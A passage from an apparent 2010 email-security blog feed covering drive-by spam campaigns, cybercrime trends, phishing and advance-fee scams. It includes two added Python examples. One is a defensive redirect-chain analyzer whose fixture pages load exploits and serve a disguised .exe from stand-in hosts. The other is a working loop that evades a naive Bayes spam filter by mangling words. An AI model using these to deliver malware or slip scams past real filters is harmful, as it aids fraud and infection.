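<p>The redirect page described in the previous post (a meta refresh straight to an executable, with an image-only link as the fallback) and the exploit-then-redirect hop described above can both be recognised without rendering the page. What follows is an added example, not code from either post or from any kit: it walks a chain of meta-refresh hops over a constructed dictionary of pages standing in for live sites and flags both patterns. Every hostname, path and file name in it is invented, and the list of &#8220;executable&#8221; extensions is an assumption.</p>

```python
"""Static triage of a "plug-n-play" redirect chain.
Added example, not code from either post. The pages in _PAGES stand in for
live sites; every host, path and file name in them is invented."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat")  # assumption: direct-payload extensions

@dataclass
class PageFacts:
    url: str
    refresh_target: str | None = None                          # <meta http-equiv="refresh">
    iframes: list[str] = field(default_factory=list)
    objects: list[str] = field(default_factory=list)           # <object data> / <embed src>
    image_only_links: list[str] = field(default_factory=list)  # <a href><img></a> with no text

class _Extractor(HTMLParser):
    def __init__(self, url: str) -> None:
        super().__init__()
        self.facts = PageFacts(url)
        self._href: str | None = None  # href of the <a> currently open, if any
        self._has_img, self._text = False, ""

    def _abs(self, u: str) -> str:
        return urljoin(self.facts.url, u.strip())

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m:
                self.facts.refresh_target = self._abs(m.group(1))
        elif tag == "iframe" and a.get("src"):
            self.facts.iframes.append(self._abs(a["src"]))
        elif tag in ("object", "embed") and (a.get("data") or a.get("src")):
            self.facts.objects.append(self._abs(a.get("data") or a["src"]))
        elif tag == "a" and a.get("href"):
            self._href, self._has_img, self._text = self._abs(a["href"]), False, ""
        elif tag == "img" and self._href is not None:
            self._has_img = True

    def handle_data(self, data):
        if self._href is not None:
            self._text += data

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            if self._has_img and not self._text.strip():
                self.facts.image_only_links.append(self._href)
            self._href = None

def is_executable(url: str) -> bool:
    return urlparse(url).path.lower().endswith(EXECUTABLE_EXT)

def follow_chain(start: str, fetch, max_hops: int = 5) -> list[PageFacts]:
    """Walk meta-refresh hops without running script. Stops on a loop, the hop
    limit, or a URL the fetcher cannot return as HTML (what a binary download looks like)."""
    hops, url, seen = [], start, set()
    while url and url not in seen and len(hops) < max_hops:
        seen.add(url)
        html = fetch(url)
        if html is None:
            break
        parser = _Extractor(url)
        parser.feed(html)
        hops.append(parser.facts)
        url = parser.facts.refresh_target
    return hops

def findings(hops: list[PageFacts]) -> list[tuple[str, str, str]]:
    out = []
    for f in hops:
        if f.refresh_target and is_executable(f.refresh_target):
            out.append(("refresh_to_executable", f.url, f.refresh_target))
        for u in f.image_only_links:
            if is_executable(u):
                out.append(("image_link_to_executable", f.url, u))
        # Exploit loaders on the page plus a refresh to another host: the redirect
        # page is doing double duty, which is the architecture described above.
        offsite = f.refresh_target and urlparse(f.refresh_target).netloc != urlparse(f.url).netloc
        if offsite and (f.iframes or f.objects):
            out.append(("exploit_then_redirect", f.url, f.refresh_target))
    return out

_PAGES = {  # constructed stand-ins for the hops; nothing here touches the network
    "http://track.example.net/r/abc": (  # variant A: load exploits, then forward to the spamvertised site
        '<html><head><meta http-equiv="refresh" content="0;url=http://pharmacy.example.com/"></head>'
        '<body><iframe src="http://exploit.example.org/load.php" width="1" height="1"></iframe>'
        '<object data="http://exploit.example.org/doc.pdf" type="application/pdf"></object></body></html>'),
    "http://pharmacy.example.com/": "<html><body><h1>Online pharmacy</h1></body></html>",
    "http://track.example.net/r/def": (  # variant B: the refresh serves the .exe; the image link is the fallback
        '<html><head><meta http-equiv="refresh" content="0;url=http://dl.example.org/adobe_flash_install.exe"></head>'
        '<body><a href="adobe_flash_install.exe"><img src="http://cdn.example.org/noflash.gif"></a></body></html>'),
}

def constructed_fetch(url: str) -> str | None:
    return _PAGES.get(url)  # None for anything outside the constructed set

if __name__ == "__main__":
    for start in ("http://track.example.net/r/abc", "http://track.example.net/r/def"):
        for kind, page, target in findings(follow_chain(start, constructed_fetch)):
            print(f"{kind:26} {page} -> {target}")
```

<p>The walker never executes script, so a redirect done with document.location or a JavaScript timer is invisible to it, and the hop limit is what keeps a looping tracker from pinning the analyzer. In a mail gateway the fetch would go through a sandboxed, non-rendering client with a short timeout and a hop limit like this one, and any hit on the first two findings is reason enough to quarantine the message regardless of what the final landing site sells.</p>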
<p><strong>Spammers ironing out the kinks</strong></p>
<p>Despite their sophistication, it appears that the spammers are still ironing out some kinks. One of the samples we blocked earlier in the day had a broken call-to-action URL, and in another sample I analyzed the redirect page was broken too: it sent the browser to the malware distribution site instead of the usual Canadian Pharmacy (or similar) drop-site. This may indicate that some kind of kit is behind this recent wave and that some spammers haven&#8217;t quite figured out how to use it effectively.</p>
<p>These campaigns occurred almost simultaneously with several other variants, all using the same &#8220;ACH&#8221; and Xerox templates. But instead of the redirection URL that is the earmark of the plug-n-play exploit framework, they used a direct link to a Windows executable (.exe). Another variant embedded the malicious executable in an archive attached directly to the spam. These more direct, traditional infection methods running alongside the plug-n-play variant suggest that the scammers are testing which delivery method is more successful.</p>
<p>A final note: The executables being used in the campaign appear to be Zbot/Bredo variants&#8211;“banking” Trojans that Red Condor has reported on in past security alerts.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=298</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Top 5 Cybercrime Trends to Watch</title>
		<link>http://www.redcondor.com/blog/?p=286</link>
		<comments>http://www.redcondor.com/blog/?p=286#comments</comments>
		<pubDate>Thu, 22 Jul 2010 23:37:15 +0000</pubDate>
		<dc:creator>C.S.</dc:creator>
				<category><![CDATA[Blended Threat]]></category>
		<category><![CDATA[Cybercrime]]></category>
		<category><![CDATA[Just plain interesting]]></category>
		<category><![CDATA[Virus]]></category>
		<category><![CDATA[botnets]]></category>
		<category><![CDATA[cyber ransom]]></category>
		<category><![CDATA[cyberespionage]]></category>
		<category><![CDATA[vish]]></category>
		<category><![CDATA[VoIP]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=286</guid>
		<description><![CDATA[In lieu of the usual year-end Top __ List (fill in the blank), I&#8217;ve decided to post my Top 5 list of trends to watch, [...]]]></description>
			<content:encoded><![CDATA[<p>In lieu of the usual year-end Top __ List (fill in the blank), I&#8217;ve decided to post my Top 5 list of trends to watch, mid-year. The underground economy built on the greed and ambition of cybercriminals is maturing, opening up new opportunities to exploit users, governments, and corporations. It behooves all of us to learn what we can, now.  </p>
<p><strong>1. Criminals will increasingly leverage opportunities to commit corporate and/or political espionage and intellectual property theft. </strong></p>
<p>With hundreds of millions of infected machines connected to the Internet, there is much potential for dedicated adversaries to seek access to zombies in specific organizations as preliminary steps in sophisticated targeted attacks. Several such events have been reported recently. As bot-herders awaken to the vast potential that their compromised machines represent &#8212; both in terms of local information as well as footholds into private networks &#8212; these information warfare attacks will ramp up considerably. </p>
<p>Right now, I presume the major impediment to these activities is simply in connecting the supply to the demand and vice-versa. As the information age underground economy continues to expand and mature, these activities have the potential to spread like wildfire.</p>
<p><strong>2. More refined systems for the monetization of private information. </strong></p>
<p>Count on a rise in the number of ransom demands by criminals in exchange for stolen information. The <a href="http://www.eweek.com/c/a/Security/Cryzip-Trojan-Encrypts-Files-Demands-Ransom/">case of the encrypted hard drive </a>is only the beginning. </p>
<p>It won’t be long before criminals figure out what they can really do with all that information&#8211;perhaps starting as a fallback if they’re unable to sell a particular resource. </p>
<p>In a similar vein, blackmail is likely to become another significant emerging threat. The targets won’t be limited to execs and political figures but will include all Internet users. I see it as a simple attack that could be mounted in much the same way &#8220;lost wallet&#8221; scams are sent to the address books of recently compromised web-mail accounts.</p>
<p><strong>3. An explosion of plug-and-play malware distribution.  </strong></p>
<p>The development of phishing and malware kits led to a threat explosion due to a lower bar to entry and ease of reproduction. A similar trend seems to be occurring, with modular plug-and-play malware distribution methods that can be easily and transparently inserted into any spam campaign. This effectively turns any spam campaign into an efficient search method for finding and exploiting vulnerable hosts. </p>
<p>In the past, malware-based spam campaigns had a single intent, to install malware on as many systems as possible, and were perpetrated by bot-herders to increase the size of their flock. Individually crafted, these campaigns took advantage of a specific new exploit or leveraged popular news items and holidays.</p>
<p>Now it appears that a new strategy is forming where any spam campaign can simply &#8220;plug in&#8221; a malware component. The stealthy drive-by techniques that enable it are general purpose, so the malware distribution infrastructure can be re-used in future campaigns without difficulty. The exploits can even be updated in real-time as new vulnerabilities are found. I expect this technique to become a permanent feature of many future spam campaigns.</p>
<p><strong>4. Increased use of novel attack vectors.</strong></p>
<p>Only recently has the average netizen become aware of the many potential risks associated with the use of social networking sites. These services represent new ways for attackers to interface with their victims as well as perform reconnaissance for targeted extended attacks and exploit the implicit trust you have in your &#8220;friends&#8221; by impersonating them. And as technologically advanced tools like smart-phones, smart-cars and other &#8220;smart&#8221; things pervade our lives I expect that we will see completely novel exploits that will catch many people off guard. </p>
<p>We might begin to see increased attacks on personal area networks that seek to exploit Bluetooth communications, or fingerprinting individuals based on signatures that can be formed from the signals emitted by the myriad devices we are constantly carrying; or social engineering attacks used to gain access to vehicles with remotely accessible door locks. </p>
<p>The ways in which technology intersects our everyday lives will fall under increased scrutiny by criminals seeking to take advantage of subtle, overlooked vulnerabilities that can stack up with disastrous consequences. Even now, with the mainstream adoption of online banking, many people still don&#8217;t understand the importance of securing their wireless home networks. </p>
<p><strong>5. A significant increase in spam and scams perpetrated via VoIP and other communication protocols. </strong></p>
<p>The fundamental properties of SMTP that led to the massive proliferation of spam are: cheap electronic message transmission and openness in communication endpoints (anyone can message anyone else). </p>
<p>VoIP systems also have these properties and as VoIP continues to proliferate, become more integrated, cheaper to access and utilize, along with several other enabling components (such as cheap bandwidth, text-to-speech, speech-to-text and translation systems), I expect that information age criminals will branch out more fully into this medium. Already there have been several reports of &#8220;vishing&#8221; attacks carried out by scammers, and I would expect these attacks to increase in volume and sophistication. </p>
<p>I expect new and creative attacks carried out through other systems sharing these properties but with better call-to-action potential, like instant messaging, micro-blogging, etc. Obviously these have been and are being abused by spammers and their ilk, but they have not yet been exploited to anywhere near the degree seen in email. As various enabling factors continue to emerge, I expect the same perverse inversion in the ratio of legitimate to illegitimate traffic to occur in VoIP and other protocols over the long term.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=286</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Corporate Execs Need to Heed the Phishing Wakeup Call</title>
		<link>http://www.redcondor.com/blog/?p=281</link>
		<comments>http://www.redcondor.com/blog/?p=281#comments</comments>
		<pubDate>Thu, 15 Jul 2010 01:56:21 +0000</pubDate>
		<dc:creator>Team R.C.</dc:creator>
				<category><![CDATA[Phishing]]></category>
		<category><![CDATA[anti-spam]]></category>
		<category><![CDATA[cyber-attacks]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=281</guid>
		<description><![CDATA[Cyber-attacks are a big topic in the media and blogosphere these days. A wake-up call, finally. Rogue states and unfriendly regimes launch attacks against the [...]]]></description>
			<content:encoded><![CDATA[<p>Cyber-attacks are a big topic in the media and blogosphere these days. A wake-up call, finally. Rogue states and unfriendly regimes launch attacks against the U.S., South Korea and other nations. Corporate spies and independent hackers infiltrate networks to obtain trade secrets and financial and account data that will either command a price on the black market or provide criminals with the means to perpetuate more criminal activities.</p>
<p>In a recent Ponemon Institute report, 83 percent of executives said their companies had been victims of an advanced threat, and nearly half of those reported theft of confidential information or intellectual property. That’s a hefty number of occurrences. And yet, for all the money corporations spend on physical security—cameras in the lobby, ID badges, biometrics and body scanners—digital “property” remains vulnerable to attack.</p>
<p>Secure access to the corporate network should move beyond the username-and-password paradigm to stronger forms of authentication such as biometrics and digital keys. Users need to be better educated about the dangers of phishing emails, especially in this era of sophisticated attacks that spoof trusted brands such as Adobe, eBay and AT&amp;T.</p>
<p>Aside from an effective anti-spam filter, the strongest defense against phishing attacks is safe user behavior, stringent policies and training procedures, and technologies that support email security solutions. To this end, Red Condor recommends the following:</p>
<ul>
<li>Strong corporate policies reinforced with regular in-person security briefings and education opportunities</li>
<li>Isolated internal networks, accessible from protected terminals, for storing valuable intellectual property – anything connected to the Internet can be stolen.</li>
<li>Stronger passwords – Establish passphrases instead of passwords. Most people use the same passwords or variations of the same passwords for multiple accounts, which makes it easy for cybercriminals to piece together identities.</li>
<li>Cyber security should be treated with the same level of importance as physical security; deploy personal authentication devices, including biometrics and digital keys for all of your users.</li>
</ul>
<p>Financial institutions should take the lead in security&#8211;given the level of sensitivity of the data they protect and issues with customer liability when corporate accounts are compromised.  The Experi-Metal (EMI) and Comerica Bank suit provides an example of the real costs of phishing. The case involves an EMI employee unwittingly responding to a phishing email that ultimately allowed scammers to transfer half a million dollars from EMI’s corporate bank account to accounts around the world. EMI is now suing Comerica for the losses.</p>
<p>Cases like this one, with more sure to follow, indicate that corporations and their executives have yet to grasp the size and scope of the phishing problem. Only new security products that complement email security solutions, together with continually updated user policies and education programs, will suffice. For these changes to occur, executives need to heed the wake-up call.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=281</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Who Falls for This Stuff Anyway?</title>
		<link>http://www.redcondor.com/blog/?p=267</link>
		<comments>http://www.redcondor.com/blog/?p=267#comments</comments>
		<pubDate>Thu, 08 Jul 2010 00:22:16 +0000</pubDate>
		<dc:creator>Raptor</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[419 scams]]></category>
		<category><![CDATA[email scams]]></category>
		<category><![CDATA[scam]]></category>

		<guid isPermaLink="false">http://www.redcondor.com/blog/?p=267</guid>
		<description><![CDATA[A Con for Every Sucker. Er, Human
Before the Internet, con artists marked their victims through snail mail and fax and earnest conversations in parking lots [...]]]></description>
			<content:encoded><![CDATA[<p><strong>A Con for Every Sucker. Er, Human</strong></p>
<p>Before the Internet, con artists marked their victims through snail mail and fax and earnest conversations in parking lots and on street corners. (Ever run into the “stranded motorist” with the empty gas can, asking to borrow $15 and promising to pay it back if you give him your address?)</p>
<p>Then the Internet came along. The con hit its stride and never looked back. Today’s email scams range from the believable to the bizarre. </p>
<p>Pure-bred Yorkshire terrier pups at bargain prices, vacation rentals in exotic locales. Mystery shopper, sales rep for obscure animal vaccine distributors, and other jobs crafted for the growing ranks of the unemployed. Lotto scams that appear to come from trusted domains. Emails with tragic accounts of adult children of murdered West African freedom fighters who need help investing their inheritance in a &#8220;good U.S. company.&#8221;</p>
<p><strong>Why do advance-fee scams work? And who is dumb enough to fall for them?</strong></p>
<p>The human factor in the success of the online con is huge. We want a deal; we want love and romance; we want a job; and we want to help our fellows. The victims are you and I and the guy in the next cube.</p>
<p>And while it may seem inconceivable that anyone would fall for the traditional 419 scam, for example, I suspect many of these victims don’t speak English as a first language and may not recognize the typical odd syntax and misspelled words in these messages.</p>
<p><strong>Preying on the Lonely and the Paranoid</strong></p>
<p>For lonely hearts, there&#8217;s the foreign girlfriend scam.  From the comfort of computer terminals in Russia and Eastern Europe, scammers string along victims, enticing them with attractive photos of their bride-to-be and affectionate messages with instructions for mailing funds to cover the cost of getting the girlfriend out of the country.  These &#8220;relationships&#8221; go on sometimes for months until the victim goes broke, gets wise, or both.</p>
<p>There&#8217;s a special place in hell for perpetrators of death threat scams—email messages from bogus hit men demanding $15K in exchange for not killing you.  To well-adjusted people, the messages seem patently ridiculous&#8211; although they make for a chilling read. But if you happen to be mentally unstable or to have a particularly nasty enemy, you could consider paying up.</p>
<p><strong>Gaming the filters</strong></p>
<p>Technology helps in the fight against these scams, but traditional anti-spam filters are only so reliable. While most spam is sent by automated bots, manually written 419 emails are usually sent via legitimate email servers and webmail accounts to fool filters and users. And scammers have gotten good at circumventing Bayesian filters. They write the message, blast it out, and wait. If the message bounces, they modify a word or phrase and try again. Eventually the message gets through, unless human monitors are there to analyze and block it.</p>
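<p>The try-again loop described above is easy to demonstrate. The following added example (not the original post&#8217;s code or any vendor&#8217;s filter) trains a minimal Graham-style token-probability filter on a handful of constructed spam and legitimate messages, scores a constructed 419 text, and then plays the scammer: each time the message still scores as spam, it mangles the single most incriminating word and retries. The training messages, the 419 text and the mangling rule are all constructed for illustration, and the loop generalises the tactic in the paragraph to any filter that scores on whole-word tokens.</p>

```python
"""Word-mangling against a naive Bayes spam filter.
Added example, not the post's code or any vendor's filter. The training
messages, the 419 text and the mangling rule are constructed for illustration."""
from __future__ import annotations
import math
import re
from collections import Counter

_TOKEN = re.compile(r"[a-z]{2,}")

def tokens(text: str) -> list[str]:
    return _TOKEN.findall(text.lower())

class TokenFilter:
    """Graham-style filter: per-token P(spam | token) from per-message presence
    counts, combined as log-odds. Tokens never seen in training are neutral."""
    def __init__(self) -> None:
        self.spam_docs, self.ham_docs = Counter(), Counter()
        self.n_spam = self.n_ham = 0

    def train(self, text: str, is_spam: bool) -> None:
        (self.spam_docs if is_spam else self.ham_docs).update(set(tokens(text)))
        if is_spam:
            self.n_spam += 1
        else:
            self.n_ham += 1

    def known(self, tok: str) -> bool:
        return tok in self.spam_docs or tok in self.ham_docs

    def spamicity(self, tok: str) -> float:
        p_spam = (self.spam_docs[tok] + 1) / (self.n_spam + 2)   # Laplace smoothing
        p_ham = (self.ham_docs[tok] + 1) / (self.n_ham + 2)
        return p_spam / (p_spam + p_ham)

    def spam_probability(self, text: str) -> float:
        logit = 0.0
        for tok in set(tokens(text)):
            if self.known(tok):
                p = self.spamicity(tok)
                logit += math.log(p) - math.log(1.0 - p)
        return 1.0 / (1.0 + math.exp(-logit))

def mangle(tok: str) -> str:
    """Split a word in two so the filter sees two tokens it never trained on."""
    half = len(tok) // 2
    return tok[:half] + "." + tok[half:]

def evade(model: TokenFilter, text: str, threshold: float = 0.5, max_edits: int = 30):
    """The scammer's loop from the post: while the message still scores as spam,
    rewrite the single most incriminating word and try again."""
    edits: list[str] = []
    while len(edits) < max_edits and model.spam_probability(text) > threshold:
        candidates = sorted(t for t in set(tokens(text)) if model.known(t))
        if not candidates:
            break
        worst = max(candidates, key=model.spamicity)  # ties broken alphabetically
        text = re.sub(rf"\b{re.escape(worst)}\b", mangle(worst), text, flags=re.I)
        edits.append(worst)
    return text, edits

# Constructed training data: four 419-style messages and four ordinary ones.
_SPAM = [
    "urgent business proposal: my late father left an inheritance of 20 million dollars in a bank account and i need your help to transfer the funds",
    "dear friend i am the son of a murdered freedom fighter and need a trusted partner to invest my inheritance in your country please reply urgently",
    "congratulations you have won the lottery a transfer fee is required to release your million dollar prize contact our bank",
    "confidential: assistance needed to transfer funds from a dormant bank account you will receive 30 percent of the million",
]
_HAM = [
    "dear all the meeting moved to monday please bring your copy of the quarterly report and the budget spreadsheet",
    "can you help me review my pull request before friday i need your comments on the rest of it the tests pass locally",
    "hi friend are you free for lunch on thursday the place in front of the office will be busy so lets leave at noon",
    "reminder from the dentist your appointment is tomorrow at nine please reply to confirm your account details",
]
SAMPLE_419 = ("Dear friend, I need your urgent help to transfer my late father's inheritance of "
              "10 million dollars from a bank to your account. You will receive 20 percent. "
              "Please reply to confirm and I will send the report for your review.")

def train_constructed_model() -> TokenFilter:
    model = TokenFilter()
    for text in _SPAM:
        model.train(text, True)
    for text in _HAM:
        model.train(text, False)
    return model

if __name__ == "__main__":
    model = train_constructed_model()
    print(f"before: P(spam) = {model.spam_probability(SAMPLE_419):.4f}")
    rewritten, edits = evade(model, SAMPLE_419)
    print(f"after {len(edits)} edits ({', '.join(edits)}): P(spam) = {model.spam_probability(rewritten):.4f}")
    print(rewritten)
```

<p>Only a handful of the thirty-odd distinct words need to change, because the verdict rested on a few high-scoring tokens (bank, million, transfer, inheritance and the like) and the loop finds them by trial, which is what a bounce-and-retry cycle does in practice. Tokenising across punctuation, feeding the mangled fragments back as new training tokens, or scoring on features other than word statistics raises the cost of each retry; the human monitors mentioned above are the backstop when the statistics alone do not hold.</p>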
<p>Sometimes the victims are people who should know better. Recently, a colleague at Red Condor almost fell for one on craigslist. An interested &#8220;buyer&#8221; emailed him about a desk he’d listed in the classifieds. The buyer was eager to complete the transaction and sent my colleague a check for $1,445 to cover the $250 desk, plus shipping across the country and an extra $100 for his trouble. My colleague was to deposit the $1,445 check (which the bank confirmed was bogus), pocket $350 and wire the remaining $1,095 to a (fake) shipping company.</p>
<p>Had my colleague gone the distance, he would’ve been out $1,095, plus bank fees for the bounced check. The appeal to people’s desire for a good deal and the time-crunch element are common traits in scams like this one.</p>
<p>Law enforcement officials tend to view these cons as isolated cases and are loath to cough up the resources needed to investigate and prosecute the scammers. So advance-fee scams persist with little or no variation in delivery vectors. What scammers lack in technological ingenuity they make up for in persistence and creativity.</p>
<p><strong>User beware: There&#8217;s a scam out there for you.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.redcondor.com/blog/?feed=rss2&amp;p=267</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
